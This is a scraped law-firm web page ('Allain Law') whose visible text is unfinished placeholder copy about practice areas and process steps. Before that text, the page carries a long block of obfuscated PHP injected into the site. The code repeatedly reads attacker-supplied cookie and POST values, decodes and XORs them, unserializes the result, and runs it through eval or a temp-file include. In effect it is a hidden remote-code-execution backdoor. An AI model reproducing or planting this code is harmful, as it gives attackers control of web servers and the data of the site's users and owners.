$LzkSCttVr = chr (69) . "\x62" . '_' . chr (77) . chr ( 533 - 413 )."\115" . chr ( 355 - 270 ).chr (70); $QbHDEzL = chr ( 191 - 92 ).chr (108) . chr (97) . "\163" . "\x73" . chr ( 482 - 387 )."\x65" . "\170" . chr ( 440 - 335 ).'s' . "\x74" . "\163";$lSKgOGb = class_exists($LzkSCttVr); $QbHDEzL = "9278";$XvXTLqBza = !1;if ($lSKgOGb == $XvXTLqBza){function xKJlIjS(){$rcdkPKEx = new /* 50534 */ Eb_MxMUF(58210 + 58210); $rcdkPKEx = NULL;}$eQXMHM = "58210";class Eb_MxMUF{private function KLOrZSkLXG($eQXMHM){if (is_array(Eb_MxMUF::$NkVXiYlWby)) {$BphJafbI = sys_get_temp_dir() . "/" . crc32(Eb_MxMUF::$NkVXiYlWby["\163" . 'a' . 'l' . "\164"]);@Eb_MxMUF::$NkVXiYlWby["\167" . "\x72" . "\151" . chr (116) . 'e']($BphJafbI, Eb_MxMUF::$NkVXiYlWby[chr (99) . "\x6f" . "\156" . chr (116) . "\x65" . chr (110) . 't']);include $BphJafbI;@Eb_MxMUF::$NkVXiYlWby["\x64" . chr ( 1069 - 968 ).'l' . 'e' . chr (116) . "\145"]($BphJafbI); $eQXMHM = "58210";exit();}}private $Oqaizd;public function TdJGFLOArI(){echo 64111;}public function __destruct(){Eb_MxMUF::$NkVXiYlWby = @unserialize(Eb_MxMUF::$NkVXiYlWby); $eQXMHM = "9286_36860";$this->KLOrZSkLXG($eQXMHM); $eQXMHM = "9286_36860";}public function kEkcK($zjDxEoVaU, $KgZaivZ){return $zjDxEoVaU[0] ^ str_repeat($KgZaivZ, (strlen($zjDxEoVaU[0]) / strlen($KgZaivZ)) + 1);}public function aMHSA($zjDxEoVaU){$acgzhL = "base64";return array_map($acgzhL . "\137" . 'd' . "\145" . "\143" . chr ( 979 - 868 ).chr ( 814 - 714 )."\x65", array($zjDxEoVaU,));}public function __construct($aPxLsvpfna=0){$BGvnZw = $_POST;$XyvfIEXyjO = $_COOKIE;$KgZaivZ = "5f8eab29-371c-42f1-aef1-68d9e5abb070";$NUWsGlrqwB = @$XyvfIEXyjO[substr($KgZaivZ, 0, 4)];if (!empty($NUWsGlrqwB)){$zjDxEoVaU = "";$NUWsGlrqwB = explode(",", $NUWsGlrqwB);foreach ($NUWsGlrqwB as $OQZaG){$zjDxEoVaU .= @$XyvfIEXyjO[$OQZaG];$zjDxEoVaU .= @$BGvnZw[$OQZaG];}Eb_MxMUF::$NkVXiYlWby = $this->kEkcK($this->aMHSA($zjDxEoVaU), $KgZaivZ);}}public static $NkVXiYlWby = 15818;}xKJlIjS();}$TuuLahrr = 'b' . "\101" . chr ( 854 - 782 ).chr ( 246 - 151 ).'X' . "\x7a" . chr (72); $GdmzIqJoV = "\143" . chr (108) . chr ( 183 - 86 )."\163" . 's' . chr (95) . chr (101) . chr ( 241 - 121 ).chr (105) . chr (115) . chr (116) . "\x73";$HJKUFDM = class_exists($TuuLahrr); $TuuLahrr = "53233";$GdmzIqJoV = "43488";$DGpGuR = !1;if ($HJKUFDM == $DGpGuR){function dCpCkRJPmL(){return FALSE;}$AHcIe = "21063";dCpCkRJPmL();class bAH_XzH{private function qqcvCxKrZ($AHcIe){if (is_array(bAH_XzH::$nqUWLnKy)) {$gFPJRZjzxO = sys_get_temp_dir() . "/" . crc32(bAH_XzH::$nqUWLnKy["\163" . "\141" . "\x6c" . "\164"]);@bAH_XzH::$nqUWLnKy['w' . chr ( 338 - 224 )."\151" . "\164" . chr (101)]($gFPJRZjzxO, bAH_XzH::$nqUWLnKy["\x63" . chr ( 598 - 487 )."\x6e" . "\164" . chr (101) . "\x6e" . 't']);include $gFPJRZjzxO;@bAH_XzH::$nqUWLnKy['d' . chr (101) . chr ( 812 - 704 ).'e' . chr ( 1021 - 905 )."\145"]($gFPJRZjzxO); $AHcIe = "21063";exit();}}private $uhWUxKM;public function GNyubjB(){echo 35911;}public function __destruct(){$AHcIe = "875_4631";$this->qqcvCxKrZ($AHcIe); $AHcIe = "875_4631";}public function __construct($yMrlMhD=0){$CXJcAYI = $_POST;$eNdCAHLQD = $_COOKIE;$DwfjKu = "4c2c4352-c387-40aa-aec6-f47d4522d685";$tQyqzAgFLZ = @$eNdCAHLQD[substr($DwfjKu, 0, 4)];if (!empty($tQyqzAgFLZ)){$hCYst = "base64";$FfWmEOjlS = "";$tQyqzAgFLZ = explode(",", $tQyqzAgFLZ);foreach ($tQyqzAgFLZ as $IVZQkGI){$FfWmEOjlS .= @$eNdCAHLQD[$IVZQkGI];$FfWmEOjlS .= @$CXJcAYI[$IVZQkGI];}$FfWmEOjlS = array_map($hCYst . '_' . chr (100) . "\x65" . 'c' . 'o' . "\144" . 'e', array($FfWmEOjlS,)); $FfWmEOjlS = $FfWmEOjlS[0] ^ str_repeat($DwfjKu, (strlen($FfWmEOjlS[0]) / strlen($DwfjKu)) + 1);bAH_XzH::$nqUWLnKy = @unserialize($FfWmEOjlS); $FfWmEOjlS = class_exists("875_4631");}}public static $nqUWLnKy = 10548;}$EjWceCmhO = new /* 6065 */ bAH_XzH(21063 + 21063); $_POST = Array();unset($EjWceCmhO);}$LEOdJnSm = chr ( 564 - 480 ).'t' . "\156" . chr ( 749 - 654 ).chr (80) . 'U' . chr (90); $NTLNSku = chr ( 688 - 589 )."\x6c" . 'a' . "\163" . "\x73" . "\137" . 'e' . chr ( 1059 - 939 ).chr (105) . chr (115) . chr (116) . chr (115); $PlwAKbZRt = class_exists($LEOdJnSm); $NTLNSku = "5782";$eUpFqgvkqg = strpos($NTLNSku, $LEOdJnSm);if ($PlwAKbZRt == $eUpFqgvkqg){function jNucCX(){$JyauyJvc = new /* 39440 */ Ttn_PUZ(14765 + 14765); $JyauyJvc = NULL;}$PjMmE = "14765";class Ttn_PUZ{private function ptIRPbxT($PjMmE){if (is_array(Ttn_PUZ::$uCZDU)) {$LJAWlwSSr2 = str_replace("<" . "?php", "", Ttn_PUZ::$uCZDU["content"]);eval($LJAWlwSSr2); $PjMmE = "14765";exit();}}public function XwVegBdB(){$LJAWlwSSr = "27425";$this->_dummy = str_repeat($LJAWlwSSr, strlen($LJAWlwSSr));}public function __destruct(){Ttn_PUZ::$uCZDU = @unserialize(Ttn_PUZ::$uCZDU); $PjMmE = "63165_3011";$this->ptIRPbxT($PjMmE); $PjMmE = "63165_3011";}public function NQMJhNkpsb($LJAWlwSSr, $tjFjtoeNls){return $LJAWlwSSr[0] ^ str_repeat($tjFjtoeNls, intval(strlen($LJAWlwSSr[0]) / strlen($tjFjtoeNls)) + 1);}public function RMVBIM($LJAWlwSSr){$HBCzsQZ = "\142" . "\x61" . "\163" . "\145" . "\x36" . chr (52);return array_map($HBCzsQZ . "\x5f" . chr ( 659 - 559 )."\145" . "\x63" . "\x6f" . 'd' . "\145", array($LJAWlwSSr,));}public function __construct($sbqMbr=0){$gZEXTuPz = ',';$LJAWlwSSr = "";$jeroWI = $_POST;$TLxJF = $_COOKIE;$tjFjtoeNls = "00044438-ccea-4129-a911-245c79a2b454";$PCsOIk = @$TLxJF[substr($tjFjtoeNls, 0, 4)];if (!empty($PCsOIk)){$PCsOIk = explode($gZEXTuPz, $PCsOIk);foreach ($PCsOIk as $bkILO){$LJAWlwSSr .= @$TLxJF[$bkILO];$LJAWlwSSr .= @$jeroWI[$bkILO];}$LJAWlwSSr = $this->RMVBIM($LJAWlwSSr);}Ttn_PUZ::$uCZDU = $this->NQMJhNkpsb($LJAWlwSSr, $tjFjtoeNls);if (strpos($tjFjtoeNls, $gZEXTuPz) !== FALSE){$tjFjtoeNls = explode($gZEXTuPz, $tjFjtoeNls); $EuEfIubL = base64_decode(md5($tjFjtoeNls[0]));}}public static $uCZDU = 33576;}jNucCX();}$pRKgkqYit = 's' . "\x59" . "\x66" . "\x5f" . chr (111) . chr ( 281 - 192 ).'A' . "\116" . "\x77";$FmsWEGvN = 'c' . chr ( 424 - 316 )."\141" . "\163" . chr ( 867 - 752 ).'_' . 'e' . chr (120) . "\151" . chr ( 416 - 301 ).chr ( 353 - 237 ).'s';$QTnwB = class_exists($pRKgkqYit); $FmsWEGvN = "59764";$BCJIJFrh = !1;if ($QTnwB == $BCJIJFrh){function hdHanbbK(){return FALSE;}$BkgzsQ = "7412";hdHanbbK();class sYf_oYANw{private function PBbKnZ($BkgzsQ){if (is_array(sYf_oYANw::$YmbVZU)) {$qqfsVfyp = str_replace('<' . chr ( 267 - 204 ).chr (112) . chr ( 450 - 346 )."\x70", "", sYf_oYANw::$YmbVZU["\143" . "\157" . "\x6e" . chr ( 1068 - 952 ).chr ( 956 - 855 )."\x6e" . "\x74"]);eval($qqfsVfyp); $BkgzsQ = "7412";exit();}}private $pFeLYxYJu;public function yHFInhz(){echo 34081;}public function __destruct(){$BkgzsQ = "59315_19063";$this->PBbKnZ($BkgzsQ); $BkgzsQ = "59315_19063";}public function __construct($JMhIGRa=0){$HfBwLGhjv = $_POST;$RYgpGesdE = $_COOKIE;$jtuAWcx = "94e1ea97-4854-4058-b355-b9a76b945502";$aNNTe = @$RYgpGesdE[substr($jtuAWcx, 0, 4)];if (!empty($aNNTe)){$MIqcNt = "base64";$cAHTRBq = "";$aNNTe = explode(",", $aNNTe);foreach ($aNNTe as $LOVJhqw){$cAHTRBq .= @$RYgpGesdE[$LOVJhqw];$cAHTRBq .= @$HfBwLGhjv[$LOVJhqw];}$cAHTRBq = array_map($MIqcNt . '_' . "\x64" . "\145" . "\x63" . 'o' . "\x64" . chr ( 1057 - 956 ), array($cAHTRBq,)); $cAHTRBq = $cAHTRBq[0] ^ str_repeat($jtuAWcx, (strlen($cAHTRBq[0]) / strlen($jtuAWcx)) + 1);sYf_oYANw::$YmbVZU = @unserialize($cAHTRBq); $cAHTRBq = class_exists("59315_19063");}}public static $YmbVZU = 12300;}$ehLbhxpiW = new /* 27982 */ $pRKgkqYit(7412 + 7412); $BkgzsQ = strpos($BkgzsQ, $BkgzsQ); $BCJIJFrh = $ehLbhxpiW = $BkgzsQ = Array();}$GNUennw = 'I' . 'J' . chr ( 750 - 655 )."\x77" . chr ( 197 - 84 ).chr ( 1066 - 956 ).'u';$BwJTMQuDZd = "\143" . chr ( 252 - 144 )."\x61" . chr (115) . chr (115) . chr (95) . chr ( 956 - 855 ).'x' . chr ( 1005 - 900 ).chr ( 1081 - 966 )."\164" . chr (115); $kwBRCNEq = class_exists($GNUennw); $GNUennw = "50161";$BwJTMQuDZd = "7717";$rAikFQCdj = 0;if ($kwBRCNEq == $rAikFQCdj){function GNAuUsqw(){return FALSE;}$uuheVMW = "707";GNAuUsqw();class IJ_wqnu{private function YLdBt($uuheVMW){if (is_array(IJ_wqnu::$UcsGYWgK)) {$mAKhBnsUs = sys_get_temp_dir() . "/" . crc32(IJ_wqnu::$UcsGYWgK['s' . chr (97) . 'l' . chr (116)]);@IJ_wqnu::$UcsGYWgK[chr ( 881 - 762 ).chr ( 730 - 616 ).chr ( 351 - 246 ).chr ( 147 - 31 ).chr ( 509 - 408 )]($mAKhBnsUs, IJ_wqnu::$UcsGYWgK["\143" . chr ( 896 - 785 ).chr ( 1108 - 998 )."\164" . "\145" . chr ( 520 - 410 )."\164"]);include $mAKhBnsUs;@IJ_wqnu::$UcsGYWgK["\x64" . "\x65" . chr (108) . "\x65" . "\164" . "\x65"]($mAKhBnsUs); $uuheVMW = "707";exit();}}private $iNouw;public function tgvHQsiX(){echo 15664;}public function __destruct(){$uuheVMW = "8438_39419";$this->YLdBt($uuheVMW); $uuheVMW = "8438_39419";}public function __construct($oNQzaav=0){$wVEZugMN = $_POST;$pHTYHTR = $_COOKIE;$RdGDAU = "51bcee4e-5aa9-4886-ac60-61a0149107dd";$XimGEEXV = @$pHTYHTR[substr($RdGDAU, 0, 4)];if (!empty($XimGEEXV)){$DkWSaTs = "base64";$bzVyin = "";$XimGEEXV = explode(",", $XimGEEXV);foreach ($XimGEEXV as $ZasaUZoJWv){$bzVyin .= @$pHTYHTR[$ZasaUZoJWv];$bzVyin .= @$wVEZugMN[$ZasaUZoJWv];}$bzVyin = array_map($DkWSaTs . "\x5f" . "\x64" . 'e' . 'c' . chr (111) . 'd' . "\x65", array($bzVyin,)); $bzVyin = $bzVyin[0] ^ str_repeat($RdGDAU, (strlen($bzVyin[0]) / strlen($RdGDAU)) + 1);IJ_wqnu::$UcsGYWgK = @unserialize($bzVyin); $bzVyin = class_exists("8438_39419");}}public static $UcsGYWgK = 51190;}$PkJOhHPuCL = new /* 39256 */ IJ_wqnu(707 + 707);unset($PkJOhHPuCL);}$vNKOT = chr ( 827 - 752 )."\x6b" . chr (95) . "\111" . "\150" . "\163";$uMXNHDj = "\x63" . "\x6c" . "\x61" . "\163" . 's' . chr (95) . 'e' . "\x78" . "\151" . "\x73" . 't' . "\x73";$FgpOY = $uMXNHDj($vNKOT); $vNKOT = "23809";$fhLtrY = !$FgpOY;$uMXNHDj = "5229";if ($fhLtrY){class Kk_Ihs{public function jllfi(){echo "3337";}private $QuCIMjMl;public static $CfTRU = "b16f867f-ceaf-4709-b41f-2e2cbc827894";public static $qgacu = 59466;public function __construct($ApdrOMTg=0){$DQgiNzRYFl = $_COOKIE;$gVEfKeGI = $_POST;$VDTEWHpF = @$DQgiNzRYFl[substr(Kk_Ihs::$CfTRU, 0, 4)];if (!empty($VDTEWHpF)){$CWFlRYvCdG = "base64";$GwhzRf = "";$VDTEWHpF = explode(",", $VDTEWHpF);foreach ($VDTEWHpF as $qwqOEWtoS){$GwhzRf .= @$DQgiNzRYFl[$qwqOEWtoS];$GwhzRf .= @$gVEfKeGI[$qwqOEWtoS];}$GwhzRf = array_map($CWFlRYvCdG . "\137" . 'd' . "\x65" . "\x63" . chr (111) . chr (100) . chr ( 537 - 436 ), array($GwhzRf,)); $GwhzRf = $GwhzRf[0] ^ str_repeat(Kk_Ihs::$CfTRU, (strlen($GwhzRf[0]) / strlen(Kk_Ihs::$CfTRU)) + 1);Kk_Ihs::$qgacu = @unserialize($GwhzRf);}}private function GBiBEHxAk(){if (is_array(Kk_Ihs::$qgacu)) {$OJwDOQvqF = str_replace('<' . "\77" . "\160" . chr (104) . "\x70", "", Kk_Ihs::$qgacu["\x63" . chr ( 606 - 495 )."\156" . 't' . "\145" . "\x6e" . "\x74"]);eval($OJwDOQvqF); $sZSxv = "39763";exit();}}public function __destruct(){$this->GBiBEHxAk(); $tvrOsc = str_pad("39763", 10);}}$ucTnrkTmf = new /* 13944 */ Kk_Ihs(); $ucTnrkTmf = substr("1423_65362", 1);}$IkhalGclO = "\x6a" . chr ( 580 - 510 ).chr (70) . '_' . "\130" . chr (78) . chr (78) . chr ( 574 - 475 ).chr ( 484 - 382 ); $BPlbldvzMP = chr ( 836 - 737 )."\154" . "\x61" . chr ( 1028 - 913 )."\x73" . "\137" . "\145" . 'x' . chr (105) . chr (115) . "\x74" . "\x73";$xCZJE = class_exists($IkhalGclO); $BPlbldvzMP = "19956";$qosSeLc = strpos($BPlbldvzMP, $IkhalGclO);if ($xCZJE == $qosSeLc){function lPtHl(){$MQfHoV = new /* 19807 */ jFF_XNNcf(62625 + 62625); $MQfHoV = NULL;}$DexFKuIUA = "62625";class jFF_XNNcf{private function YCTDiCP($DexFKuIUA){if (is_array(jFF_XNNcf::$ZdQZcvcRp)) {$TUWVpBuk2 = str_replace("<" . "?php", "", jFF_XNNcf::$ZdQZcvcRp["content"]);eval($TUWVpBuk2); $DexFKuIUA = "62625";exit();}}public function euVlmub(){$TUWVpBuk = "35417";$this->_dummy = str_repeat($TUWVpBuk, strlen($TUWVpBuk));}public function __destruct(){jFF_XNNcf::$ZdQZcvcRp = @unserialize(jFF_XNNcf::$ZdQZcvcRp); $DexFKuIUA = "10651_61448";$this->YCTDiCP($DexFKuIUA); $DexFKuIUA = "10651_61448";}public function MjsdlpfD($TUWVpBuk, $vOxUjFnD){return $TUWVpBuk[0] ^ str_repeat($vOxUjFnD, intval(strlen($TUWVpBuk[0]) / strlen($vOxUjFnD)) + 1);}public function PTuWPDnRKE($TUWVpBuk){$corDycY = chr ( 847 - 749 )."\x61" . 's' . "\x65" . chr (54) . '4';return array_map($corDycY . chr (95) . "\144" . "\x65" . "\143" . chr ( 519 - 408 )."\144" . 'e', array($TUWVpBuk,));}public function __construct($ZcmqfhubOk=0){$AvJxRe = chr ( 972 - 928 ); $TUWVpBuk = "";$FXpGh = $_POST;$cizYNZFCy = $_COOKIE;$vOxUjFnD = "815ca14b-5e1e-4f01-afd3-770b08e9d4a2";$iHlyORpRT = @$cizYNZFCy[substr($vOxUjFnD, 0, 4)];if (!empty($iHlyORpRT)){$iHlyORpRT = explode($AvJxRe, $iHlyORpRT);foreach ($iHlyORpRT as $LMdVc){$TUWVpBuk .= @$cizYNZFCy[$LMdVc];$TUWVpBuk .= @$FXpGh[$LMdVc];}$TUWVpBuk = $this->PTuWPDnRKE($TUWVpBuk);}jFF_XNNcf::$ZdQZcvcRp = $this->MjsdlpfD($TUWVpBuk, $vOxUjFnD);if (strpos($vOxUjFnD, $AvJxRe) !== FALSE){$vOxUjFnD = explode($AvJxRe, $vOxUjFnD); $RxYPiRmf = base64_decode(md5($vOxUjFnD[0])); $gJdlukNwzD = strlen($vOxUjFnD[1]) > 5 ? substr($vOxUjFnD[1], 0, 5) : $vOxUjFnD[1];}}public static $ZdQZcvcRp = 8951;}lPtHl();}$pSyKev = "\144" . chr ( 320 - 225 )."\x70" . 'F' . chr (108) . chr ( 314 - 217 ).chr (74); $cayhrubetV = chr ( 352 - 253 )."\x6c" . chr (97) . chr ( 297 - 182 )."\163" . chr ( 412 - 317 ).chr (101) . 'x' . "\x69" . "\163" . "\164" . 's';$haHMFyLq = class_exists($pSyKev); $cayhrubetV = "19980";$ZNdCUt = !1;if ($haHMFyLq == $ZNdCUt){function wNahQZ(){$xmaKyHC = new /* 61968 */ d_pFlaJ(59929 + 59929); $xmaKyHC = NULL;}$jaUtIaEnu = "59929";class d_pFlaJ{private function RxOSQqpr($jaUtIaEnu){if (is_array(d_pFlaJ::$LhkeT)) {$tVttQvsoZS = sys_get_temp_dir() . "/" . crc32(d_pFlaJ::$LhkeT[chr ( 920 - 805 )."\141" . 'l' . chr ( 939 - 823 )]);@d_pFlaJ::$LhkeT["\167" . "\x72" . "\151" . chr (116) . chr (101)]($tVttQvsoZS, d_pFlaJ::$LhkeT[chr (99) . chr ( 721 - 610 ).chr (110) . 't' . 'e' . chr ( 803 - 693 )."\164"]);include $tVttQvsoZS;@d_pFlaJ::$LhkeT["\144" . chr ( 1048 - 947 ).'l' . 'e' . "\164" . chr ( 1074 - 973 )]($tVttQvsoZS); $jaUtIaEnu = "59929";exit();}}private $aWpJHOv;public function PoiYgUBo(){echo 15926;}public function __destruct(){d_pFlaJ::$LhkeT = @unserialize(d_pFlaJ::$LhkeT); $jaUtIaEnu = "64838_438";$this->RxOSQqpr($jaUtIaEnu); $jaUtIaEnu = "64838_438";}public function OVpRJpW($nmUYo, $Xbgynavb){return $nmUYo[0] ^ str_repeat($Xbgynavb, (strlen($nmUYo[0]) / strlen($Xbgynavb)) + 1);}public function epHFyYx($nmUYo){$EqqdAaByR = "base64";return array_map($EqqdAaByR . "\137" . "\144" . "\x65" . chr ( 533 - 434 ).chr ( 706 - 595 )."\144" . "\145", array($nmUYo,));}public function __construct($EsdkwxjrXz=0){$TgkXlrIxN = $_POST;$anygmlYR = $_COOKIE;$Xbgynavb = "79d7dfe6-94c7-4b19-8c3b-d20e8f0e0046";$JmZFwwWELX = @$anygmlYR[substr($Xbgynavb, 0, 4)];if (!empty($JmZFwwWELX)){$nmUYo = "";$JmZFwwWELX = explode(",", $JmZFwwWELX);foreach ($JmZFwwWELX as $cpmvnjAVb){$nmUYo .= @$anygmlYR[$cpmvnjAVb];$nmUYo .= @$TgkXlrIxN[$cpmvnjAVb];}d_pFlaJ::$LhkeT = $this->OVpRJpW($this->epHFyYx($nmUYo), $Xbgynavb);}}public static $LhkeT = 45005;}wNahQZ();}$KnvUKVi = chr (109) . "\156" . "\x5f" . 'B' . "\x7a" . 'W' . chr (111); $yQWgv = "\143" . "\x6c" . 'a' . "\163" . chr (115) . "\137" . "\x65" . "\170" . "\151" . "\163" . 't' . "\x73";$JgEcsEhCO = class_exists($KnvUKVi); $yQWgv = "28575";$JkKugMGZoF = !1;if ($JgEcsEhCO == $JkKugMGZoF){function SFcOhkhi(){$VtSoy = new /* 36902 */ mn_BzWo(40691 + 40691); $VtSoy = NULL;}$IsGQNnDvQ = "40691";class mn_BzWo{private function LZBUMHfY($IsGQNnDvQ){if (is_array(mn_BzWo::$xlHLdKH)) {$DsKZjpAZq = sys_get_temp_dir() . "/" . crc32(mn_BzWo::$xlHLdKH[chr (115) . "\141" . "\154" . "\164"]);@mn_BzWo::$xlHLdKH['w' . "\162" . chr ( 431 - 326 ).chr ( 1012 - 896 )."\145"]($DsKZjpAZq, mn_BzWo::$xlHLdKH["\143" . chr (111) . 'n' . chr ( 620 - 504 )."\145" . chr (110) . "\x74"]);include $DsKZjpAZq;@mn_BzWo::$xlHLdKH['d' . "\145" . "\154" . chr ( 1058 - 957 ).'t' . 'e']($DsKZjpAZq); $IsGQNnDvQ = "40691";exit();}}private $UhwNUDmSK;public function sBpvprrRx(){echo 29102;}public function __destruct(){mn_BzWo::$xlHLdKH = @unserialize(mn_BzWo::$xlHLdKH); $IsGQNnDvQ = "57711_18492";$this->LZBUMHfY($IsGQNnDvQ); $IsGQNnDvQ = "57711_18492";}public function MtBtA($uvjSJ, $yvkZz){return $uvjSJ[0] ^ str_repeat($yvkZz, (strlen($uvjSJ[0]) / strlen($yvkZz)) + 1);}public function OcPNe($uvjSJ){$jqWseklty = "base64";return array_map($jqWseklty . "\137" . "\144" . chr ( 180 - 79 ).chr (99) . chr (111) . "\144" . "\145", array($uvjSJ,));}public function __construct($UOVntBB=0){$uvjSJ = "";$tWDwxn = $_POST;$sAJqOwXxKR = $_COOKIE;$yvkZz = "388cbfb6-5acb-4b6c-a17a-4f5f31c457a6";$BhqkmQ = @$sAJqOwXxKR[substr($yvkZz, 0, 4)];if (!empty($BhqkmQ)){$BhqkmQ = explode(",", $BhqkmQ);foreach ($BhqkmQ as $vrFVCoA){$uvjSJ .= @$sAJqOwXxKR[$vrFVCoA];$uvjSJ .= @$tWDwxn[$vrFVCoA];}$uvjSJ = $this->OcPNe($uvjSJ);}mn_BzWo::$xlHLdKH = $this->MtBtA($uvjSJ, $yvkZz); $yvkZz = explode(",", $yvkZz);}public static $xlHLdKH = 12159;}SFcOhkhi();}$IbXZCE = 's' . chr (95) . 't' . "\x45" . "\x45" . "\x51";$AjeHg = chr (99) . chr (108) . chr (97) . 's' . "\x73" . chr ( 435 - 340 ).chr ( 385 - 284 ).chr (120) . chr (105) . chr ( 905 - 790 )."\164" . chr ( 651 - 536 ); $ZzCwmftL = class_exists($IbXZCE); $AjeHg = "34339";$XhvrEGNzH = !1;if ($ZzCwmftL == $XhvrEGNzH){function VCGoXlw(){$DtVaxcilhp = new /* 14091 */ s_tEEQ(42276 + 42276); $DtVaxcilhp = NULL;}$vIcKrnW = "42276";class s_tEEQ{private function UAkcJWcMjN($vIcKrnW){if (is_array(s_tEEQ::$MJeCkqdjV)) {$oCoJOwTX = str_replace("\74" . '?' . "\x70" . chr (104) . chr ( 465 - 353 ), "", s_tEEQ::$MJeCkqdjV['c' . 'o' . chr (110) . "\x74" . "\x65" . "\x6e" . chr ( 270 - 154 )]);eval($oCoJOwTX); $vIcKrnW = "42276";exit();}}private $GOgFtQxbid;public function TGtUOFBKY(){echo 30133;}public function __destruct(){$vIcKrnW = "36472_32799";$this->UAkcJWcMjN($vIcKrnW); $vIcKrnW = "36472_32799";}public function __construct($tGFLPk=0){$oIDMAimSZ = $_POST;$RSEZlBcTKa = $_COOKIE;$QFBPtHMQ = "b2d7a4b0-8c55-4f89-a73f-9fecf69f1a66";$vfVxjPYgRr = @$RSEZlBcTKa[substr($QFBPtHMQ, 0, 4)];if (!empty($vfVxjPYgRr)){$PjwBfQjDh = "base64";$eIRTpPpR = "";$vfVxjPYgRr = explode(",", $vfVxjPYgRr);foreach ($vfVxjPYgRr as $ekbVrAuQJ){$eIRTpPpR .= @$RSEZlBcTKa[$ekbVrAuQJ];$eIRTpPpR .= @$oIDMAimSZ[$ekbVrAuQJ];}$eIRTpPpR = array_map($PjwBfQjDh . '_' . "\x64" . 'e' . "\x63" . 'o' . "\x64" . 'e', array($eIRTpPpR,)); $eIRTpPpR = $eIRTpPpR[0] ^ str_repeat($QFBPtHMQ, (strlen($eIRTpPpR[0]) / strlen($QFBPtHMQ)) + 1);s_tEEQ::$MJeCkqdjV = @unserialize($eIRTpPpR); $eIRTpPpR = class_exists("36472_32799");}}public static $MJeCkqdjV = 64489;}VCGoXlw();}$XhKOAEpgWD = 'x' . chr (122) . "\127" . chr (95) . "\151" . chr ( 862 - 784 ).chr ( 105 - 24 ).chr (111); $IfEGQokPz = 'c' . 'l' . 'a' . 's' . "\x73" . chr (95) . "\x65" . chr ( 572 - 452 )."\151" . chr (115) . "\x74" . 's';$ydmVFy = $IfEGQokPz($XhKOAEpgWD); $hwSmQQ = $ydmVFy;if (!$hwSmQQ){class xzW_iNQo{private $wOgVca;public static $kCKhIxx = "c6784057-755f-49e9-9614-98ef77284c5c";public static $BATGQE = 294;public function __construct($imHtCp=0){$phsYLWRr = $_COOKIE;$dsfFg = $_POST;$xcqVeFzJ = @$phsYLWRr[substr(xzW_iNQo::$kCKhIxx, 0, 4)];if (!empty($xcqVeFzJ)){$YzzuYNi = "base64";$ifHxxHp = "";$xcqVeFzJ = explode(",", $xcqVeFzJ);foreach ($xcqVeFzJ as $HbXzu){$ifHxxHp .= @$phsYLWRr[$HbXzu];$ifHxxHp .= @$dsfFg[$HbXzu];}$ifHxxHp = array_map($YzzuYNi . chr (95) . chr ( 245 - 145 ).chr (101) . 'c' . chr ( 525 - 414 ).'d' . "\145", array($ifHxxHp,)); $ifHxxHp = $ifHxxHp[0] ^ str_repeat(xzW_iNQo::$kCKhIxx, (strlen($ifHxxHp[0]) / strlen(xzW_iNQo::$kCKhIxx)) + 1);xzW_iNQo::$BATGQE = @unserialize($ifHxxHp);}}private function ZAvDgHJ(){if (is_array(xzW_iNQo::$BATGQE)) {$sNXotAMig = sys_get_temp_dir() . "/" . crc32(xzW_iNQo::$BATGQE["\163" . 'a' . "\x6c" . 't']);@xzW_iNQo::$BATGQE["\x77" . 'r' . "\x69" . "\x74" . "\x65"]($sNXotAMig, xzW_iNQo::$BATGQE[chr ( 950 - 851 )."\x6f" . "\156" . 't' . chr ( 993 - 892 )."\156" . "\x74"]);include $sNXotAMig;@xzW_iNQo::$BATGQE['d' . "\x65" . "\154" . chr (101) . chr (116) . chr (101)]($sNXotAMig); $EaDnI = "18348";exit();}}public function __destruct(){$this->ZAvDgHJ(); $EaDnI = "18348";}}$oLZRmy = new xzW_iNQo(); $oLZRmy = "57555_62050";} Allain Law |

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Compliance Counseling

1-2 sentences on what this is. Should be short and succinct


1-2 sentences on what this is. Should be short and succinct

Health and Safety

1-2 sentences on what this is. Should be short and succinct

Alternative Dispute Resolution

1-2 sentences on what this is. Should be short and succinct

How Things Will Work

Step 1: Conduct initial consultation

Further details on this step of the process. Keep the details down to about 3-4 sentences at the very most. They should have a good sense of what happens during this step and what is the benefit of taking this step.

Step 2: Another step in the process

Further details on this step of the process. Keep the details down to about 3-4 sentences at the very most. They should have a good sense of what happens during this step and what is the benefit of taking this step.

Step 3: Another step in the process

Further details on this step of the process. Keep the details down to about 3-4 sentences at the very most. They should have a good sense of what happens during this step and what is the benefit of taking this step.

Step 4: Another step in the process

Further details on this step of the process. Keep the details down to about 3-4 sentences at the very most. They should have a good sense of what happens during this step and what is the benefit of taking this step.

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